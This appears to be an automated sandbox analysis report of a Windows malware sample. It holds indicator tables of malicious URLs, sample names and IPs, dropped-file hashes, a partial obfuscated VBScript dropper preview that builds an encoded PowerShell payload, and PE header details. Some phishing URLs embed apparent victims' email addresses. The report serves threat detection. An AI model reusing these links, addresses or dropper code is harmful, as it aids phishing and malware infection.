bitbucket.org | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.com | malicious | ScreenConnect Tool | 185.166.143.48
bitbucket.org | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.pl | malicious | ScreenConnect Tool | 185.166.143.50
bitbucket.org | https://nuance-pdf-professional2.software.informer.com/7.2/ | malicious | Unknown | 185.166.143.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASLINE-AS-APASLINELIMITEDHK | http://1wprru.life | malicious | Unknown | 154.197.121.128
ASLINE-AS-APASLINELIMITEDHK | PO#910663595.exe | malicious | FormBook | 213.176.96.198
ASLINE-AS-APASLINELIMITEDHK | random.exe | malicious | Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar | 62.60.226.64
ASLINE-AS-APASLINELIMITEDHK | dDFw6mJ.exe | malicious | Vidar | 62.60.226.64
ASLINE-AS-APASLINELIMITEDHK | E41ACurBrc.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar | 62.60.226.64
ASLINE-AS-APASLINELIMITEDHK | https://bet3659985.com/ | malicious | Unknown | 154.197.92.136
ASLINE-AS-APASLINELIMITEDHK | Salimuyu.exe | malicious | LummaC, PureLog Stealer | 62.60.226.37
ASLINE-AS-APASLINELIMITEDHK | 8FoLmElXOp.exe | malicious | FormBook | 107.148.150.76
ASLINE-AS-APASLINELIMITEDHK | Bo7KMzo3y4.exe | malicious | FormBook, GuLoader | 107.148.150.76
ASLINE-AS-APASLINELIMITEDHK | dwYcCLXXTF.exe | malicious | FormBook | 107.148.150.76
AMAZON-02US | dlr.arm5.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | https://doxnero.sg-azure.top/ | malicious | Unknown | 76.76.21.21
AMAZON-02US | LaudoBombeiro.msi | malicious | AteraAgent | 13.35.58.31
AMAZON-02US | https://doxnero.sg-azure.top/ | malicious | Unknown | 76.76.21.21
AMAZON-02US | https://doxnero.sg-azure.top/ | malicious | HTMLPhisher | 76.76.21.21
AMAZON-02US | https://2fa.com-token-auth.com/XaDg2clM2YnpKT1lnV2s1NzFwQUphUGNLajE5WkFsWG1aYVVxamhmckZlM3VwMkZkQktJNlMxazRhenRTMFdNdEdybll5UExNM0F1ODd5NU4rblJ3V1hKRVhTZDZDZGhUSHhiY2Z6RERJYjVHMVpKbHRuVnJQdjdTN0x5UFdWTVBDUi9jdEFwNlU1YnExRXJlK2FVeHRqZWx3TFU2WStPd0lMQnNvR2tzYjBLcXQ3cDJveUFabEYxUmk1dTFlYTRPZFN1aHdEMjNHZXUxaHRMOVdaeTBISklEMUpZME9nPT0tLWR0bHdLN3lqZUJPVVI5YnAtLXRpa1lsc2hYNnVaUkF4TVhXMTl2M1E9PQ==?cid=2399161896 | malicious | KnowBe4 | 54.231.170.152
AMAZON-02US | https://opnform.com/forms/sterling-seacrest-pritchard-f5yh4d/ | malicious | Unknown | 3.167.227.87
AMAZON-02US | https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306 | malicious | Unknown | 54.187.159.182
AMAZON-02US | botnet.arm.elf | malicious | Mirai, Moobot | 18.224.211.105
AMAZON-02US | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFkF-2B2O7FNVDtEn7eLCg79KlX5G84IMpmk8M6ri2Vxg6C8-yF_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZMXg-2FLON9H7IisNa7-2FMldO-2FR3HOYlJJtNlYWzE4oc4yZxIgvOftMYP-2BXgKsio2Q6589B1x8hawo7hbmdPcls9tPnKo66VXX3Tn-2BcXM44gBUpU5F6RI6HcAMwO3LhxcNNwkYtK-2FqAo2C3T1UGbgJlVXQ0xctNXiRk9-2FCJaFtjFg-2BJc35OL7TZrBL1g4Puk-2BccaK2xqac6-2FG1JoGVNooXDsYP9cJzDJo5uqnAluX75NFp6m5Pd9RiM08Fi-2Fw0-2FgSQNmg-3D#Fshawn@kinexuscpa.com | malicious | HTMLPhisher | 18.245.60.74
FASTLYUS | Mc3FDUMnVz.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer | 185.199.111.133
FASTLYUS | rH3TpuMpZn.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, Vidar | 185.199.111.133
FASTLYUS | https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7 | malicious | HTMLPhisher | 151.101.130.217
FASTLYUS | https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7 | malicious | HTMLPhisher | 151.101.130.217
FASTLYUS | LaudoBombeiro.msi | malicious | AteraAgent | 199.232.214.172
FASTLYUS | https://2fa.com-token-auth.com/XaDg2clM2YnpKT1lnV2s1NzFwQUphUGNLajE5WkFsWG1aYVVxamhmckZlM3VwMkZkQktJNlMxazRhenRTMFdNdEdybll5UExNM0F1ODd5NU4rblJ3V1hKRVhTZDZDZGhUSHhiY2Z6RERJYjVHMVpKbHRuVnJQdjdTN0x5UFdWTVBDUi9jdEFwNlU1YnExRXJlK2FVeHRqZWx3TFU2WStPd0lMQnNvR2tzYjBLcXQ3cDJveUFabEYxUmk1dTFlYTRPZFN1aHdEMjNHZXUxaHRMOVdaeTBISklEMUpZME9nPT0tLWR0bHdLN3lqZUJPVVI5YnAtLXRpa1lsc2hYNnVaUkF4TVhXMTl2M1E9PQ==?cid=2399161896 | malicious | KnowBe4 | 199.232.192.193
FASTLYUS | https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxg | malicious | Unknown | 151.101.2.137
FASTLYUS | https://opnform.com/forms/sterling-seacrest-pritchard-f5yh4d/ | malicious | Unknown | 151.101.194.137
FASTLYUS | https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306 | malicious | Unknown | 151.101.128.176
FASTLYUS | http:///sites.google.com/view/drive-u-7-home/ | malicious | Unknown | 151.101.130.49
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Mc3FDUMnVz.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7 | malicious | HTMLPhisher | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | https://doxnero.sg-azure.top/ | malicious | Unknown | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | createdbetterthingswithbestgoodthings.hta | malicious | Cobalt Strike | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | https://www.itsnoneofyourbaddytimesup.com/lLGTHo9 | malicious | HTMLPhisher | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306 | malicious | Unknown | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | FACTURA SOLICITADA.exe | malicious | GuLoader, Snake Keylogger | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | https://click.rewardlink.com/?upn=dXJsPWFIUjBjSE02THk5amIyUmxjeTV5WlhkaGNtUmpiMlJsY3k1amIyMHZjakl2TVM5eVluZEhTRnBZYVVkb2FUVnVSbEUzT1ZaR1dFaHhXblZuUTJoNldHMWljbXB1VUZWR1JtMVRXVmh0TURaNVRtWm9OMlJRYjJWVGFIbHlVRTlhYzAxUCZkZWxpdmVyeUlkPTE3MjY0ODY0NSZlbWFpbEFkZHJlc3M9YmZhbmd1eUB1c2NvcnRlYy5jb20= | malicious | Unknown | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | rNovaconsultaP232687_pdf.vbs | malicious | Unknown | 185.166.143.49, 185.199.108.153
3b5074b1b5d032e5620f69f9f700ff0e | Quotation.exe | malicious | MassLogger RAT | 185.166.143.49, 185.199.108.153
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | RFQ#003110-Al Nasr.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | PI and payment confirmed pdf.exe | malicious | Remcos
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | EjyI1K8H1L.exe | malicious | Quasar
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | HAVqwf064o.exe | malicious | Quasar
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | Purchase_order.js | malicious | AgentTesla
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | SecuriteInfo.com.Win32.PWSX-gen.5956.28112.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | LxzE0wDnVoi4VKU.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | SecuriteInfo.com.W32.AIDetectNet.01.10857.exe | malicious | BluStealer, SpyEx
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | Doc0627.exe | malicious | BluStealer, SpyEx
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:CSV text
Category:dropped
Size (bytes):226
Entropy (8bit):5.360398796477698
Encrypted:false
SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:3A8957C6382192B71471BD14359D0B12
SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:Nlllulh49//lz:NllUu9//
MD5:AADE84B9650AB09D8DC304B168D6D555
SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
Malicious:false
Preview:@...e................................................@..........
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):15146
Entropy (8bit):5.440992384635616
Encrypted:false
SSDEEP:192:6XIpwHqJVlBYos2MKni4juj4iQFpAR7c7NF9Wu0MDxpnO/9iCn:/hHBYTlZWF20v10MFpWiI
MD5:51868B18B3FD5A5358969E8778770BEC
SHA1:370E82B9B6C79F5111EA3CF4EE3ACCEFF1763400
SHA-256:E1219C4B024AEACF2B6637D1ABABC373A5B89FA084E79B887608103CD4D85702
SHA-512:6E00DA6277381AF4DB7C17FF8B964751AC9C035940C78B808E0C7B38F1080EE7DD7858705348C19C8E2FC4E52C1B891B09B80F7CA6BA5BDBCBEE468B1DEDFB13
Malicious:true
Preview: 'g..IjronFcnmih = rRegisggfgdsadffghgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@Z")..Call Ugsfisging("wBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I")..cAfhmdkd = TimeSerial(8,9,8)..Public Const frnbrmpb = "FobdSdj"..eikbacoIh = "hffhfg" & LenB("mkijkodI") & "hfg"..'iFhIIkho ohprdhA..gnbSmIk = TimeSerial(7,9,8)..Public Const akSeegcfi = "gkgIcmk"..Call Ugsfisging("@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@B")..Call Ugsfisging("l@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu")..Call Ugsfi
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2625616
Entropy (8bit):6.344611118010868
Encrypted:false
SSDEEP:49152:S6F5PsH1IaspqACp//9NqqAJN77F29ZJOx2uc:jw16psLqqAJN77F29jOx27
MD5:0A7608DB01CAE07792CEA95E792AA866
SHA1:71DFF876E4D5EDB6CEA78FEE7AA15845D4950E24
SHA-256:C16336AB32195B08C1678220FBE0256FEE865F623E2B32FCFA4D9825FD68977E
SHA-512:990A6FA1B8ADB6727B1DCD8931AD84FDCB556533B78F896A71EAE2A7E3AE3222E4B8EFAA4B629CED2841211750E0D8A75DDD546A983C2E586918DD8BA4E0DC42
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: RFQ#003110-Al Nasr.exe, Detection: malicious
• Filename: PI and payment confirmed pdf.exe, Detection: malicious
• Filename: EjyI1K8H1L.exe, Detection: malicious
• Filename: HAVqwf064o.exe, Detection: malicious
• Filename: Purchase_order.js, Detection: malicious
• Filename: SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.5956.28112.exe, Detection: malicious
• Filename: LxzE0wDnVoi4VKU.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.10857.exe, Detection: malicious
• Filename: Doc0627.exe, Detection: malicious
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........).*QH.yQH.yQH.y..-yPH.y..,y_H.y...yTH.y...yPH.yO.^ySH.y.).xRH.y.(.xWH.y.(.x_H.y.(.xNH.y.(.x\H.y...y@H.yQH.y)I.y.).x:H.y.).xPH.y.)2yPH.y.).xPH.yRichQH.y........PE..L..."D.]..........".......!...................!...@..........................0(......(...@...... ....................!.V.....".......#.L.............'.PB....&.00..`...T................... ...........@............."..............................text...F.!.......!................. ..`.data...H.....!.......!.............@....idata..>.....".. ....".............@..@.tls..........".......".............@....rsrc...L.....#.......".............@..@.reloc..00....&..2....&.............@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe
File Type:ASCII text, with very long lines (304)
Category:dropped
Size (bytes):6809
Entropy (8bit):4.315080724582697
Encrypted:false
SSDEEP:96:zKcDGKD7zrrRYZZ/HPw4//HP/HH6K1jqQiGyGTFchzCKtihKCsO2b0N/+7vKAKPO:VrRYZXCKgQifr8sC/635P
MD5:BF06030E740D56E94EE78B0CE7A3AA98
SHA1:54884365A2FADBFB5AC48F01026D5A0EA14B89E6
SHA-256:A6BC3067D98446F82CE6ADB6E0E052294D4F46ACFA2ED07CB6C2F4D437623407
SHA-512:B44F05B5A0C286D5A0461607E400028A9E0198CF4A1B1A082840A5727FD5619D8085C30A456DFB0A144281CCFA24DF709A1020E2B72A94F1FBABD7679B6156AE
Malicious:false
Preview:Microsoft (R) Visual Basic Compiler version 14.8.4084.for Visual Basic 2012.Copyright (c) Microsoft Corporation. All rights reserved...This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to Visual Basic 2012, which is no longer the latest version. For compilers that support newer versions of the Visual Basic programming language, see http://go.microsoft.com/fwlink/?LinkID=533241.. Visual Basic Compiler Options.. - OUTPUT FILE -./out:<file> Specifies the output file name../target:exe Create a console application (default). (Short form: /t)./target:winexe Create a Windows application../target:library Create a library assembly../target:module Create a module that can be added to an assembly../target:appcontainerexe Create a Windows application that runs in AppContainer../ta
                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):6.848921649188907
                                                                                                              TrID:
                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
                                                                                                              File size:163'328 bytes
                                                                                                              MD5:6159b2025a32b10d721f03c7141577d8
                                                                                                              SHA1:829beb712c7ad268f05865bc982d9db519079433
                                                                                                              SHA256:8db64fb78d54b15b0648d454b3678b0200431114cb1058d70f4783278b7feb70
                                                                                                              SHA512:b6fd30a5c76d40b0949a34de2dba060bc915ccc0dc6fcc0b8050da9a064ff0f8c487cac4b1fa7b16d545c4c31d77f4a9aedb3997e17e96e3af60b724d60cfa22
                                                                                                              SSDEEP:3072:EahKyd2n31zf5GWp1icKAArDZz4N9GhbkrNEk1QOwgT:EahOzp0yN90QEOwc
TLSH: E7F39D4A63E420B6E4B657B498F202975A32BCB15B7982FF12C4D57E0E336C0A532F57
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
Icon Hash: 3b6120282c4c5a1f
Entrypoint: 0x140008200
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 10
OS Version Minor: 0
File Version Major: 10
File Version Minor: 0
Subsystem Version Major: 10
Subsystem Version Minor: 0
Import Hash: 4cea7ae85c87ddc7295d39ff9cda31d1
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1ccc8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1ce00 | 8a4743408e36b906553cf05f5f13d58c | False | 0.7385433576839827 | data | 7.045854433521184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x172c | Microsoft Cabinet archive data, Windows 2000/XP setup, 5932 bytes, 1 file, at 0x2c +A "67a7e5e159f71.vbs", ID 1258, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0018543492919758
RT_RCDATA | 0x2af9c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afa0 | 0x24 | data | English | United States | 0.7222222222222222
RT_RCDATA | 0x2afc4 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afcc | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afd4 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afd8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2afe0 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2afe4 | 0x1d | ASCII text, with no line terminators | English | United States | 1.2758620689655173
RT_RCDATA | 0x2b004 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b008 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b00c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b014 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2b01c | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2b0d8 | 0x408 | data | English | United States | 0.42151162790697677
RT_MANIFEST | 0x2b4e0 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
